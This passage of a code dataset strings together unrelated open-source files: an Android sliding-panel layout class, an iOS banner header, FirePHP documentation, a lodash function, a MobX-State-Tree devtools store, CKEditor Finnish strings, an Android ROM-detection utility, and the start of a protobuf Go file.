public boolean expandPanel(float mSlideOffset) {\n if (mSlideableView == null || mSlideState == SlideState.EXPANDED) return false;\n mSlideableView.setVisibility(View.VISIBLE);\n return expandPanel(mSlideableView, 0, mSlideOffset);\n }\n\n /**\n * Check if the sliding panel in this layout is fully expanded.\n *\n * @return true if sliding panel is completely expanded\n */\n public boolean isPanelExpanded() {\n return mSlideState == SlideState.EXPANDED;\n }\n\n /**\n * Check if the sliding panel in this layout is anchored.\n *\n * @return true if sliding panel is anchored\n */\n public boolean isPanelAnchored() {\n return mSlideState == SlideState.ANCHORED;\n }\n\n /**\n * Check if the sliding panel in this layout is currently visible.\n *\n * @return true if the sliding panel is visible.\n */\n public boolean isPanelHidden() {\n return mSlideState == SlideState.HIDDEN;\n }\n\n /**\n * Shows the panel from the hidden state\n */\n public void showPanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.COLLAPSED;\n } else {\n if (mSlideableView == null || mSlideState != SlideState.HIDDEN) return;\n mSlideableView.setVisibility(View.VISIBLE);\n requestLayout();\n smoothSlideTo(0, 0);\n }\n }\n\n /**\n * Hides the sliding panel entirely.\n */\n public void hidePanel() {\n if (mFirstLayout) {\n mSlideState = SlideState.HIDDEN;\n } else {\n if (mSlideState == SlideState.DRAGGING || mSlideState == SlideState.HIDDEN) return;\n int newTop = computePanelTopPosition(0.0f) + (mIsSlidingUp ? +mPanelHeight : -mPanelHeight);\n smoothSlideTo(computeSlideOffset(newTop), 0);\n }\n }\n\n @SuppressLint(\"NewApi\")\n private void onPanelDragged(int newTop) {\n mSlideState = SlideState.DRAGGING;\n // Recompute the slide offset based on the new top position\n mSlideOffset = computeSlideOffset(newTop);\n // Update the parallax based on the new slide offset\n if ((mParallaxOffset > 0 || mDirectOffset) && mSlideOffset >= 0) {\n int mainViewOffset = 0;\n if (mParallaxOffset > 0) {\n mainViewOffset = getCurrentParalaxOffset();\n } else {\n mainViewOffset = (int) (getDirectionalSlideOffset() * mSlideRange);\n }\n\n mMainView.setTranslationY(mainViewOffset);\n }\n\n // Dispatch the slide event\n dispatchOnPanelSlide(mSlideableView);\n // If the slide offset is negative, and overlay is not on, we need to increase the\n // height of the main content\n if (mSlideOffset <= 0 && !mOverlayContent) {\n // expand the main view\n LayoutParams lp = (LayoutParams) mMainView.getLayoutParams();\n lp.height = mIsSlidingUp ? (newTop - getPaddingBottom()) : (getHeight() - getPaddingBottom() - mSlideableView.getMeasuredHeight() - newTop);\n mMainView.requestLayout();\n }\n }\n\n @Override\n protected boolean drawChild(Canvas canvas, View child, long drawingTime) {\n boolean result;\n final int save = canvas.save(Canvas.CLIP_SAVE_FLAG);\n\n if (isSlidingEnabled() && mMainView == child) {\n // Clip against the slider; no sense drawing what will immediately be covered,\n // Unless the panel is set to overlay content\n if (!mOverlayContent) {\n canvas.getClipBounds(mTmpRect);\n if (mIsSlidingUp) {\n mTmpRect.bottom = Math.min(mTmpRect.bottom, mSlideableView.getTop());\n } else {\n mTmpRect.top = Math.max(mTmpRect.top, mSlideableView.getBottom());\n }\n canvas.clipRect(mTmpRect);\n }\n }\n\n result = super.drawChild(canvas, child, drawingTime);\n canvas.restoreToCount(save);\n\n if (mCoveredFadeColor != 0 && mSlideOffset > 0) {\n final int baseAlpha = (mCoveredFadeColor & 0xff000000) >>> 24;\n final int imag = (int) (baseAlpha * mSlideOffset);\n final int color = imag << 24 | (mCoveredFadeColor & 0xffffff);\n mCoveredFadePaint.setColor(color);\n canvas.drawRect(mTmpRect, mCoveredFadePaint);\n }\n\n return result;\n }\n\n /**\n * Smoothly animate mDraggingPane to the target X position within its range.\n *\n * @param slideOffset position to animate to\n * @param velocity initial velocity in case of fling, or 0.\n */\n boolean smoothSlideTo(float slideOffset, int velocity) {\n if (!isSlidingEnabled()) {\n // Nothing to do.\n return false;\n }\n\n int panelTop = computePanelTopPosition(slideOffset);\n if (mDragHelper.smoothSlideViewTo(mSlideableView, mSlideableView.getLeft(), panelTop)) {\n setAllChildrenVisible();\n ViewCompat.postInvalidateOnAnimation(this);\n return true;\n }\n return false;\n }\n\n @Override\n public void computeScroll() {\n if (mDragHelper != null && mDragHelper.continueSettling(true)) {\n if (!isSlidingEnabled()) {\n mDragHelper.abort();\n return;\n }\n\n ViewCompat.postInvalidateOnAnimation(this);\n }\n }\n\n @Override\n public void draw(Canvas c) {\n super.draw(c);\n\n if (!isSlidingEnabled()) {\n // No need to draw a shadow if we don't have one.\n return;\n }\n\n final int right = mSlideableView.getRight();\n final int top;\n final int bottom;\n if (mIsSlidingUp) {\n top = mSlideableView.getTop() - mShadowHeight;\n bottom = mSlideableView.getTop();\n } else {\n top = mSlideableView.getBottom();\n bottom = mSlideableView.getBottom() + mShadowHeight;\n }\n final int left = mSlideableView.getLeft();\n\n if (mShadowDrawable != null) {\n mShadowDrawable.setBounds(left, top, right, bottom);\n mShadowDrawable.draw(c);\n }\n }\n\n /**\n * Tests scrollability within child views of v given a delta of dx.\n *\n * @param v View to test for horizontal scrollability\n * @param checkV Whether the view v passed should itself be checked for scrollability (true),\n * or just its children (false).\n * @param dx Delta scrolled in pixels\n * @param x X coordinate of the active touch point\n * @param y Y coordinate of the active touch point\n * @return true if child views of v can be scrolled by delta of dx.\n */\n protected boolean canScroll(View v, boolean checkV, int dx, int x, int y) {\n if (v instanceof ViewGroup) {\n final ViewGroup group = (ViewGroup) v;\n final int scrollX = v.getScrollX();\n final int scrollY = v.getScrollY();\n final int count = group.getChildCount();\n // Count backwards - let topmost views consume scroll distance first.\n for (int i = count - 1; i >= 0; i--) {\n final View child = group.getChildAt(i);\n if (x + scrollX >= child.getLeft() && x + scrollX < child.getRight() &&\n y + scrollY >= child.getTop() && y + scrollY < child.getBottom() &&\n canScroll(child, true, dx, x + scrollX - child.getLeft(),\n y + scrollY - child.getTop())) {\n return true;\n }\n }\n }\n return checkV && ViewCompat.canScrollHorizontally(v, -dx);\n }\n\n @Override\n protected ViewGroup.LayoutParams generateDefaultLayoutParams() {\n return new LayoutParams();\n }\n\n @Override\n protected ViewGroup.LayoutParams generateLayoutParams(ViewGroup.LayoutParams p) {\n return p instanceof MarginLayoutParams\n ? new LayoutParams((MarginLayoutParams) p)\n : new LayoutParams(p);\n }\n\n @Override\n protected boolean checkLayoutParams(ViewGroup.LayoutParams p) {\n return p instanceof LayoutParams && super.checkLayoutParams(p);\n }\n\n @Override\n public ViewGroup.LayoutParams generateLayoutParams(AttributeSet attrs) {\n return new LayoutParams(getContext(), attrs);\n }\n\n @Override\n public Parcelable onSaveInstanceState() {\n Parcelable superState = super.onSaveInstanceState();\n\n SavedState ss = new SavedState(superState);\n ss.mSlideState = mSlideState;\n\n return ss;\n }\n\n @Override\n public void onRestoreInstanceState(Parcelable state) {\n SavedState ss = (SavedState) state;\n super.onRestoreInstanceState(ss.getSuperState());\n mSlideState = ss.mSlideState;\n }\n\n /**\n * Current state of the slideable view.\n */\n private enum SlideState {\n EXPANDED,\n COLLAPSED,\n ANCHORED,\n HIDDEN,\n DRAGGING\n }\n\n /**\n * Listener for monitoring events about sliding panes.\n */\n public interface PanelSlideListener {\n /**\n * Called when a sliding pane's position changes.\n *\n * @param panel The child view that was moved\n * @param slideOffset The new offset of this sliding pane within its range, from 0-1\n */\n void onPanelSlide(View panel, float slideOffset);\n\n /**\n * Called when a sliding panel becomes slid completely collapsed.\n *\n * @param panel The child view that was slid to an collapsed position\n */\n void onPanelCollapsed(View panel);\n\n /**\n * Called when a sliding panel becomes slid completely expanded.\n *\n * @param panel The child view that was slid to a expanded position\n */\n void onPanelExpanded(View panel);\n\n /**\n * Called when a sliding panel becomes anchored.\n *\n * @param panel The child view that was slid to a anchored position\n */\n void onPanelAnchored(View panel);\n\n /**\n * Called when a sliding panel becomes completely hidden.\n *\n * @param panel The child view that was slid to a hidden position\n */\n void onPanelHidden(View panel);\n }\n\n /**\n * No-op stubs for {@link PanelSlideListener}. If you only want to implement a subset\n * of the listener methods you can extend this instead of implement the full interface.\n */\n public static class SimplePanelSlideListener implements PanelSlideListener {\n @Override\n public void onPanelSlide(View panel, float slideOffset) {\n }\n\n @Override\n public void onPanelCollapsed(View panel) {\n }\n\n @Override\n public void onPanelExpanded(View panel) {\n }\n\n @Override\n public void onPanelAnchored(View panel) {\n }\n\n @Override\n public void onPanelHidden(View panel) {\n }\n }\n\n public static class LayoutParams extends MarginLayoutParams {\n private static final int[] ATTRS = new int[]{\n android.R.attr.layout_weight\n };\n\n public LayoutParams() {\n super(MATCH_PARENT, MATCH_PARENT);\n }\n\n public LayoutParams(int width, int height) {\n super(width, height);\n }\n\n public LayoutParams(ViewGroup.LayoutParams source) {\n super(source);\n }\n\n public LayoutParams(MarginLayoutParams source) {\n super(source);\n }\n\n public LayoutParams(LayoutParams source) {\n super(source);\n }\n\n public LayoutParams(Context c, AttributeSet attrs) {\n super(c, attrs);\n\n final TypedArray a = c.obtainStyledAttributes(attrs, ATTRS);\n a.recycle();\n }\n\n }\n\n static class SavedState extends BaseSavedState {\n public static final Creator CREATOR =\n new Creator() {\n @Override\n public SavedState createFromParcel(Parcel in) {\n return new SavedState(in);\n }\n\n @Override\n public SavedState[] newArray(int size) {\n return new SavedState[size];\n }\n };\n SlideState mSlideState;\n\n SavedState(Parcelable superState) {\n super(superState);\n }\n\n private SavedState(Parcel in) {\n super(in);\n try {\n mSlideState = Enum.valueOf(SlideState.class, in.readString());\n } catch (IllegalArgumentException e) {\n mSlideState = SlideState.COLLAPSED;\n }\n }\n\n @Override\n public void writeToParcel(Parcel out, int flags) {\n super.writeToParcel(out, flags);\n out.writeString(mSlideState.toString());\n }\n }\n\n private class DragHelperCallback extends ViewDragHelper.Callback {\n\n @Override\n public boolean tryCaptureView(View child, int pointerId) {\n if (mIsUnableToDrag) {\n return false;\n }\n\n return child == mSlideableView;\n }\n\n @Override\n public void onViewDragStateChanged(int state) {\n if (mDragHelper.getViewDragState() == ViewDragHelper.STATE_IDLE) {\n mSlideOffset = computeSlideOffset(mSlideableView.getTop());\n\n if (mSlideOffset == 1) {\n if (mSlideState != SlideState.EXPANDED) {\n updateObscuredViewVisibility();\n mSlideState = SlideState.EXPANDED;\n dispatchOnPanelExpanded(mSlideableView);\n }\n } else if (mSlideOffset == 0) {\n if (mSlideState != SlideState.COLLAPSED) {\n mSlideState = SlideState.COLLAPSED;\n dispatchOnPanelCollapsed(mSlideableView);\n }\n } else if (mSlideOffset < 0) {\n mSlideState = SlideState.HIDDEN;\n mSlideableView.setVisibility(View.GONE);\n dispatchOnPanelHidden(mSlideableView);\n } else if (mSlideState != SlideState.ANCHORED) {\n updateObscuredViewVisibility();\n mSlideState = SlideState.ANCHORED;\n dispatchOnPanelAnchored(mSlideableView);\n }\n }\n }\n\n @Override\n public void onViewCaptured(View capturedChild, int activePointerId) {\n setAllChildrenVisible();\n }\n\n @Override\n public void onViewPositionChanged(View changedView, int left, int top, int dx, int dy) {\n onPanelDragged(top);\n invalidate();\n }\n\n @Override\n public void onViewReleased(View releasedChild, float xvel, float yvel) {\n int target = 0;\n\n // direction is always positive if we are sliding in the expanded direction\n float direction = mIsSlidingUp ? -yvel : yvel;\n\n if (direction > 0) {\n // swipe up -> expand\n target = computePanelTopPosition(1.0f);\n } else if (direction < 0) {\n // swipe down -> collapse\n target = computePanelTopPosition(0.0f);\n } else if (mAnchorPoint != 1 && mSlideOffset >= (1.f + mAnchorPoint) / 2) {\n // zero velocity, and far enough from anchor point => expand to the top\n target = computePanelTopPosition(1.0f);\n } else if (mAnchorPoint == 1 && mSlideOffset >= 0.5f) {\n // zero velocity, and far enough from anchor point => expand to the top\n target = computePanelTopPosition(1.0f);\n } else if (mAnchorPoint != 1 && mSlideOffset >= mAnchorPoint) {\n target = computePanelTopPosition(mAnchorPoint);\n } else if (mAnchorPoint != 1 && mSlideOffset >= mAnchorPoint / 2) {\n target = computePanelTopPosition(mAnchorPoint);\n } else {\n // settle at the bottom\n target = computePanelTopPosition(0.0f);\n }\n\n mDragHelper.settleCapturedViewAt(releasedChild.getLeft(), target);\n invalidate();\n }\n\n @Override\n public int getViewVerticalDragRange(View child) {\n return mSlideRange;\n }\n\n @Override\n public int clampViewPositionVertical(View child, int top, int dy) {\n final int collapsedTop = computePanelTopPosition(0.f);\n final int expandedTop = computePanelTopPosition(1.0f);\n if (mIsSlidingUp) {\n return Math.min(Math.max(top, expandedTop), collapsedTop);\n } else {\n return Math.min(Math.max(top, collapsedTop), expandedTop);\n }\n }\n }\n}\n"} {"text": "//\n// YPCycleBanner.h\n// Wuxianda\n//\n// Created by MichaelPPP on 16/7/11.\n// Copyright © 2016年 michaelhuyp. All rights reserved.\n// 无线轮播图控件封装\n\n#import \n\n/** 轮播图将要开始拖动发出的通知 */\nUIKIT_EXTERN NSString* const kCycleBannerWillBeginDraggingNotification;\n/** 轮播图结束滑动发出的通知 */\nUIKIT_EXTERN NSString* const kCycleBannerDidEndDeceleratingNotification;\n\n@class YPCycleBanner;\ntypedef void(^YPCycleBannerBlock)(NSUInteger didselectIndex);\n\n\n@interface YPCycleBanner : UIView\n\n/** 图片url数组 */\n@property (nonatomic, copy) NSArray *models;\n\n/** 自动滚动间隔时间,默认5s */\n@property (nonatomic, assign) NSTimeInterval autoScrollTimeInterval;\n\n/**\n * 初始化方法\n *\n * @param frame 轮播图的frame\n * @param placeholderImage 占位图片\n * @param block block\n *\n * @return 轮播图实例\n */\n+ (instancetype)bannerViewWithFrame:(CGRect)frame placeholderImage:(UIImage *)placeholderImage block:(YPCycleBannerBlock)block;\n\n@end\n"} {"text": "\nWelcome to the new official home of the FirePHP documentation.\n\nNOTE: Some external links to FirePHP information are still included as not everything has been consolidated here yet.\n\n\nStatus\n======\n\nFirePHP 1.0 is currently in **public BETA** and will go STABLE very soon. Your [feedback](OpenSource#support) is important to get us there.\n\n\nFirePHP 1.0\n===========\n\nWelcome to FirePHP 1.0, the result of 3+ years of learning and experimenting on how to build a PHP development and debugging solution that\ncan save you some real time and frustration.\n\n**FirePHP is an advanced logging system that can display PHP variables in the browser as an application is navigated.** All communication\nis out of band to the application meaning that the logging data will not interfere with the normal functioning of the application.\n\nTraditionally, if you are not using an interactive debugger, you would typically debug your application with:\n\n CODE: {\"lang\":\"php\"}\n \n var_dump($variable);\n // or\n print_r($variable);\n\nThe problem with this approach is that:\n\n * The debug output is intermingled with your response data leading to broken page display and ajax responses\n * It is difficult to distinguish between many printed variables\n * It is impossible to determine where a specific debug message was triggered\n * The debug statements must be removed again when done\n * Larger object graphs (especially cyclical ones) cannot be printed or are too large too navigate intelligently\n\nPrevious attempts to solve these shortcomings have resulted in:\n\n * Interactive debuggers\n * PHP libraries that make printed variables more easy to navigate on the page\n * PHP libraries that log variables to files for later inspection\n\nEach of these solutions have their place but overall the shortcomings make for a less than ideal day-to-day development\nand debugging experience for the average developer in many/most cases.\n\nThe original goal of FirePHP (back in 2007) was to provide another approach by sending debug data in the response headers \n(no interference with response data) and display this nicely in the [Firebug](http://getfirebug.com/) [Console](http://getfirebug.com/commandline).\nThe approach seems to solve some real problems and is getting some good attention as FirePHP has become and continues to become more popular.\n\nThe FirePHP 1.0 system is the next incarnation of this approach and built from the groud up based on the\n[latest research and technology](http://christophdorn.com/Research/) to provide the foundation for a new kind of\ndevelopment and debugging approach that combines the best of:\n\n * **Error Reporting** - PHP native and used to detect syntax errors and API usage violations.\n * **Print Statements** - Deliberate *var_dump()* or *print()* statements by developer used to track execution flow and variables.\n * **Logging** - Deliberate logging to a file or other facility used to track events, execution flow and variables.\n * **Interactive Debugging** - PHP extension used by developer to directly interact with a running script to track live variable state.\n\nPLANNED: FirePHP integration with [Xdebug](http://xdebug.org/) is planned.\n\nWith FirePHP 1.0, variables are logged using the [Insight API](API/Insight):\n\n CODE: {\"lang\":\"php\", \"run\": \"http://reference.developercompanion.com/Tools/FirePHPCompanion/Run/Examples/TestRunner/index.php?x-insight=activate&action=run&snippet=insight-devcomp/snippets/HelloWorld\"}\n\n $console = FirePHP::to('page')->console();\n $console->label('The Label')->log('Hello World');\n $console->label('A Variable')->log($_GET);\n\nNOTE: The [traditional FirePHP API](API/FirePHP) is still supported.\n\nAnd displayed in the [Firebug](http://getfirebug.com/) [Console](http://getfirebug.com/commandline) or the [DeveloperCompanion](Clients#devcomp) Request Inspector respectively:\n\n![Firebug Console Image](resources/images/screenshots/HelloWorldFirebugConsole.png) ![DeveloperCompanion Request Inspector Image](resources/images/screenshots/HelloWorldDeveloperCompanion.png)\n\nFirePHP 1.0 is all about getting all types of meta and debug data from the server/application to the client in an intelligent way.\nNow that variable logging is pretty much complete further development will be adding support for displaying server log files, PHP configuration information,\napplication source files and much more in the client.\n\nWe welcome your interest in FirePHP and hope that it will save you time and frustration.\n\nNext Step: [Install](Install)\n"} {"text": "var baseFor = require('./_baseFor'),\n castFunction = require('./_castFunction'),\n keysIn = require('./keysIn');\n\n/**\n * Iterates over own and inherited enumerable string keyed properties of an\n * object and invokes `iteratee` for each property. The iteratee is invoked\n * with three arguments: (value, key, object). Iteratee functions may exit\n * iteration early by explicitly returning `false`.\n *\n * @static\n * @memberOf _\n * @since 0.3.0\n * @category Object\n * @param {Object} object The object to iterate over.\n * @param {Function} [iteratee=_.identity] The function invoked per iteration.\n * @returns {Object} Returns `object`.\n * @see _.forInRight\n * @example\n *\n * function Foo() {\n * this.a = 1;\n * this.b = 2;\n * }\n *\n * Foo.prototype.c = 3;\n *\n * _.forIn(new Foo, function(value, key) {\n * console.log(key);\n * });\n * // => Logs 'a', 'b', then 'c' (iteration order is not guaranteed).\n */\nfunction forIn(object, iteratee) {\n return object == null\n ? object\n : baseFor(object, castFunction(iteratee), keysIn);\n}\n\nmodule.exports = forIn;\n"} {"text": "import AbstractStore from './AbstractStore';\nimport preferences from '../../preferences';\n\nexport default class MSTChangesStore extends AbstractStore {\n mstLogEnabled = false;\n\n itemsDataByRootId = {};\n rootNamesById = {};\n\n constructor(bridge) {\n super();\n this.bridge = bridge;\n\n this.addDisposer(\n bridge.sub('frontend:append-mst-log-items', (newLogItem) => {\n const rootId = newLogItem.rootId;\n if (!this.itemsDataByRootId[rootId]) {\n if (!this.activeRootId) {\n this.activeRootId = rootId;\n this.emit('activeRootId');\n }\n this.itemsDataByRootId[rootId] = Object.create(null);\n this.itemsDataByRootId[rootId].logItemsIds = [];\n this.itemsDataByRootId[rootId].logItemsById = {};\n }\n const itemData = this.itemsDataByRootId[rootId];\n if (newLogItem.length > 500) {\n this.spliceLogItems(rootId, 0, itemData.logItemsIds.length - 480);\n }\n itemData.activeLogItemId = newLogItem.id;\n itemData.activeLogItemIndex = itemData.logItemsIds.length;\n itemData.logItemsIds.push(newLogItem.id);\n itemData.logItemsById[newLogItem.id] = newLogItem;\n\n this.emit('activeLogItemId');\n this.emit('mstLogItems');\n this.selectLogItemId(newLogItem.id);\n }),\n bridge.sub('mst-log-item-details', (logItem) => {\n const itemData = this.itemsDataByRootId[logItem.rootId];\n if (!itemData) return;\n itemData.logItemsById[logItem.id] = logItem;\n this.emit(logItem.id);\n }),\n bridge.sub('frontend:mst-roots', (roots) => {\n roots.forEach(({ id, name }) => {\n this.rootNamesById[id] = name;\n });\n this.emit('mstRootsUpdated');\n }),\n bridge.sub('frontend:remove-mst-root', (rootId) => {\n delete this.rootNamesById[rootId];\n delete this.itemsDataByRootId[rootId];\n this.emit('mstRootsUpdated');\n })\n );\n\n preferences.get('mstLogEnabled').then(({ mstLogEnabled = true }) => {\n if (mstLogEnabled) this.toggleMstLogging(true);\n });\n }\n\n toggleMstLogging(mstLogEnabled = !this.mstLogEnabled) {\n if (mstLogEnabled !== this.mstLogEnabled) {\n this.mstLogEnabled = mstLogEnabled;\n preferences.set({ mstLogEnabled });\n this.emit('mstLogEnabled');\n this.bridge.send('backend-mst:set-tracking-enabled', mstLogEnabled);\n }\n }\n\n commitAll() {\n Object.keys(this.itemsDataByRootId).forEach((rootId) => {\n this.spliceLogItems(rootId, 0, this.itemsDataByRootId[rootId].logItemsIds.length - 1);\n });\n this.emit('mstLogItems');\n }\n\n spliceLogItems(rootId, startIndex = 0, endIndex = Infinity) {\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n const logItemsIds = itemData.logItemsIds;\n const removedItemsIds = logItemsIds.splice(startIndex, endIndex);\n removedItemsIds.forEach((id) => {\n delete itemData.logItemsById[id];\n });\n if (itemData.selectLogItemId && removedItemsIds.indexOf(itemData.selectedLogItemId) !== -1) {\n this.selectLogItemId(undefined);\n }\n this.bridge.send('backend-mst:forget-mst-items', { rootId, itemsIds: removedItemsIds });\n }\n\n activateRootId(rootId) {\n this.activeRootId = rootId;\n this.emit('activeRootId');\n }\n\n activateLogItemId(logItemId) {\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n this.bridge.send('backend-mst:activate-log-item-id', { rootId, logItemId });\n itemData.activeLogItemId = logItemId;\n itemData.activeLogItemIndex = itemData.logItemsIds.indexOf(logItemId);\n this.emit('activeLogItemId');\n }\n\n commitLogItemId(logItemId) {\n this.activateLogItemId(logItemId);\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n const idx = itemData.logItemsIds.indexOf(logItemId);\n if (idx !== -1) {\n this.spliceLogItems(rootId, 0, idx);\n }\n this.emit('mstLogItems');\n }\n\n cancelLogItemId(logItemId) {\n this.activateLogItemId(logItemId);\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n const idx = itemData.logItemsIds.indexOf(logItemId);\n if (idx !== -1 && idx !== 0) {\n this.activateLogItemId(itemData.logItemsIds[idx - 1]);\n this.spliceLogItems(rootId, idx);\n }\n this.emit('mstLogItems');\n }\n\n selectLogItemId(logItemId) {\n const rootId = this.activeRootId;\n const itemData = this.itemsDataByRootId[rootId];\n if (!itemData) return;\n itemData.selectedLogItemId = logItemId;\n this.emit('selectedLogItemId');\n this.getDetails(logItemId);\n }\n\n getDetails(logItemId) {\n this.bridge.send('get-mst-log-item-details', {\n rootId: this.activeRootId,\n logItemId,\n });\n }\n}\n"} {"text": "/*\nCopyright (c) 2003-2018, CKSource - Frederico Knabben. All rights reserved.\nFor licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license\n*/\nCKEDITOR.plugins.setLang( 'table', 'fi', {\n\tborder: 'Rajan paksuus',\n\tcaption: 'Otsikko',\n\tcell: {\n\t\tmenu: 'Solu',\n\t\tinsertBefore: 'Lisää solu eteen',\n\t\tinsertAfter: 'Lisää solu perään',\n\t\tdeleteCell: 'Poista solut',\n\t\tmerge: 'Yhdistä solut',\n\t\tmergeRight: 'Yhdistä oikealla olevan kanssa',\n\t\tmergeDown: 'Yhdistä alla olevan kanssa',\n\t\tsplitHorizontal: 'Jaa solu vaakasuunnassa',\n\t\tsplitVertical: 'Jaa solu pystysuunnassa',\n\t\ttitle: 'Solun ominaisuudet',\n\t\tcellType: 'Solun tyyppi',\n\t\trowSpan: 'Rivin jatkuvuus',\n\t\tcolSpan: 'Solun jatkuvuus',\n\t\twordWrap: 'Rivitys',\n\t\thAlign: 'Horisontaali kohdistus',\n\t\tvAlign: 'Vertikaali kohdistus',\n\t\talignBaseline: 'Alas (teksti)',\n\t\tbgColor: 'Taustan väri',\n\t\tborderColor: 'Reunan väri',\n\t\tdata: 'Data',\n\t\theader: 'Ylätunniste',\n\t\tyes: 'Kyllä',\n\t\tno: 'Ei',\n\t\tinvalidWidth: 'Solun leveyden täytyy olla numero.',\n\t\tinvalidHeight: 'Solun korkeuden täytyy olla numero.',\n\t\tinvalidRowSpan: 'Rivin jatkuvuuden täytyy olla kokonaisluku.',\n\t\tinvalidColSpan: 'Solun jatkuvuuden täytyy olla kokonaisluku.',\n\t\tchooseColor: 'Valitse'\n\t},\n\tcellPad: 'Solujen sisennys',\n\tcellSpace: 'Solujen väli',\n\tcolumn: {\n\t\tmenu: 'Sarake',\n\t\tinsertBefore: 'Lisää sarake vasemmalle',\n\t\tinsertAfter: 'Lisää sarake oikealle',\n\t\tdeleteColumn: 'Poista sarakkeet'\n\t},\n\tcolumns: 'Sarakkeet',\n\tdeleteTable: 'Poista taulu',\n\theaders: 'Ylätunnisteet',\n\theadersBoth: 'Molemmat',\n\theadersColumn: 'Ensimmäinen sarake',\n\theadersNone: 'Ei',\n\theadersRow: 'Ensimmäinen rivi',\n\tinvalidBorder: 'Reunan koon täytyy olla numero.',\n\tinvalidCellPadding: 'Solujen sisennyksen täytyy olla numero.',\n\tinvalidCellSpacing: 'Solujen välin täytyy olla numero.',\n\tinvalidCols: 'Sarakkeiden määrän täytyy olla suurempi kuin 0.',\n\tinvalidHeight: 'Taulun korkeuden täytyy olla numero.',\n\tinvalidRows: 'Rivien määrän täytyy olla suurempi kuin 0.',\n\tinvalidWidth: 'Taulun leveyden täytyy olla numero.',\n\tmenu: 'Taulun ominaisuudet',\n\trow: {\n\t\tmenu: 'Rivi',\n\t\tinsertBefore: 'Lisää rivi yläpuolelle',\n\t\tinsertAfter: 'Lisää rivi alapuolelle',\n\t\tdeleteRow: 'Poista rivit'\n\t},\n\trows: 'Rivit',\n\tsummary: 'Yhteenveto',\n\ttitle: 'Taulun ominaisuudet',\n\ttoolbar: 'Taulu',\n\twidthPc: 'prosenttia',\n\twidthPx: 'pikseliä',\n\twidthUnit: 'leveysyksikkö'\n} );\n"} {"text": "package com.matisse.ucrop.immersion;\n\nimport android.os.Build;\nimport android.text.TextUtils;\n\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.regex.Pattern;\n\n/**\n * @author:luck\n * @data:2018/3/28 下午1:02\n * @描述: Rom版本管理\n */\n\npublic class CropRomUtils {\n public class AvailableRomType {\n public static final int MIUI = 1;\n public static final int FLYME = 2;\n public static final int ANDROID_NATIVE = 3;\n public static final int NA = 4;\n }\n\n\n private static Integer romType;\n\n public static int getLightStatausBarAvailableRomType() {\n if (romType != null) {\n return romType;\n }\n\n if (isMIUIV6OrAbove()) {\n romType = AvailableRomType.MIUI;\n return romType;\n }\n\n if (isFlymeV4OrAbove()) {\n romType = AvailableRomType.FLYME;\n return romType;\n }\n\n if (isAndroid5OrAbove()) {\n romType = AvailableRomType.ANDROID_NATIVE;\n return romType;\n }\n\n romType = AvailableRomType.NA;\n return romType;\n }\n\n //Flyme V4的displayId格式为 [Flyme OS 4.x.x.xA]\n //Flyme V5的displayId格式为 [Flyme 5.x.x.x beta]\n private static boolean isFlymeV4OrAbove() {\n return (getFlymeVersion() >= 4);\n }\n\n\n //Flyme V4的displayId格式为 [Flyme OS 4.x.x.xA]\n //Flyme V5的displayId格式为 [Flyme 5.x.x.x beta]\n public static int getFlymeVersion() {\n String displayId = Build.DISPLAY;\n if (!TextUtils.isEmpty(displayId) && displayId.contains(\"Flyme\")) {\n displayId = displayId.replaceAll(\"Flyme\", \"\");\n displayId = displayId.replaceAll(\"OS\", \"\");\n displayId = displayId.replaceAll(\" \", \"\");\n\n\n String version = displayId.substring(0, 1);\n\n if (version != null) {\n return stringToInt(version);\n }\n }\n return 0;\n }\n\n //MIUI V6对应的versionCode是4\n //MIUI V7对应的versionCode是5\n private static boolean isMIUIV6OrAbove() {\n String miuiVersionCodeStr = getSystemProperty(\"ro.miui.ui.version.code\");\n if (!TextUtils.isEmpty(miuiVersionCodeStr)) {\n try {\n int miuiVersionCode = Integer.parseInt(miuiVersionCodeStr);\n if (miuiVersionCode >= 4) {\n return true;\n }\n } catch (Exception e) {\n }\n }\n return false;\n }\n\n\n public static int getMIUIVersionCode() {\n String miuiVersionCodeStr = getSystemProperty(\"ro.miui.ui.version.code\");\n int miuiVersionCode = 0;\n if (!TextUtils.isEmpty(miuiVersionCodeStr)) {\n try {\n miuiVersionCode = Integer.parseInt(miuiVersionCodeStr);\n return miuiVersionCode;\n } catch (Exception e) {\n }\n }\n return miuiVersionCode;\n }\n\n\n //Android Api 23以上\n private static boolean isAndroid5OrAbove() {\n if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) {\n return true;\n }\n return false;\n }\n\n\n public static String getSystemProperty(String propName) {\n String line;\n BufferedReader input = null;\n try {\n Process p = Runtime.getRuntime().exec(\"getprop \" + propName);\n input = new BufferedReader(new InputStreamReader(p.getInputStream()), 1024);\n line = input.readLine();\n input.close();\n } catch (IOException ex) {\n return null;\n } finally {\n if (input != null) {\n try {\n input.close();\n } catch (IOException e) {\n }\n }\n }\n return line;\n }\n\n public static int stringToInt(String str) {\n Pattern pattern = Pattern.compile(\"^[-\\\\+]?[\\\\d]+$\");\n if (pattern.matcher(str).matches()) {\n return Integer.valueOf(str);\n }\n return 0;\n }\n}\n"} {"text": "// Code generated by protoc-gen-go. DO NOT EDIT.\n// source: google/protobuf/any.proto\n\npackage any // import \"github.com/golang/protobuf/ptypes/any\"\n\nimport proto \"github.com/golang/protobuf/proto\"\nimport fmt \"fmt\"\nimport math \"math\"\n\n// Reference imports to suppress errors if they are not otherwise used.\nvar _ = proto.Marshal\nvar _ = fmt.Errorf\nvar _ = math.Inf\n\n// This is a compile-time assertion to ensure that this generated file\n// is compatible with the proto package it is being compiled against.\n// A compilation error at this line likely means your copy of the\n// proto package needs to be updated.\nconst _ = proto.ProtoPackageIsVersion2 // please upgrade the proto package\n\n// `Any` contains an arbitrary serialized protocol buffer message along with a\n// URL that describes the type of the serialized message.\n//\n// Protobuf library provides support to pack/unpack Any values in the form\n// of utility functions or additional generated methods of the Any type.\n//\n// Example 1: Pack and unpack a message in C++.\n//\n// Foo foo = ...;\n// Any any;\n// any.PackFrom(foo);\n// ...\n// if (any.UnpackTo(&foo)) {\n// ...\n// }\n//\n// Example 2: Pack and unpack a message in 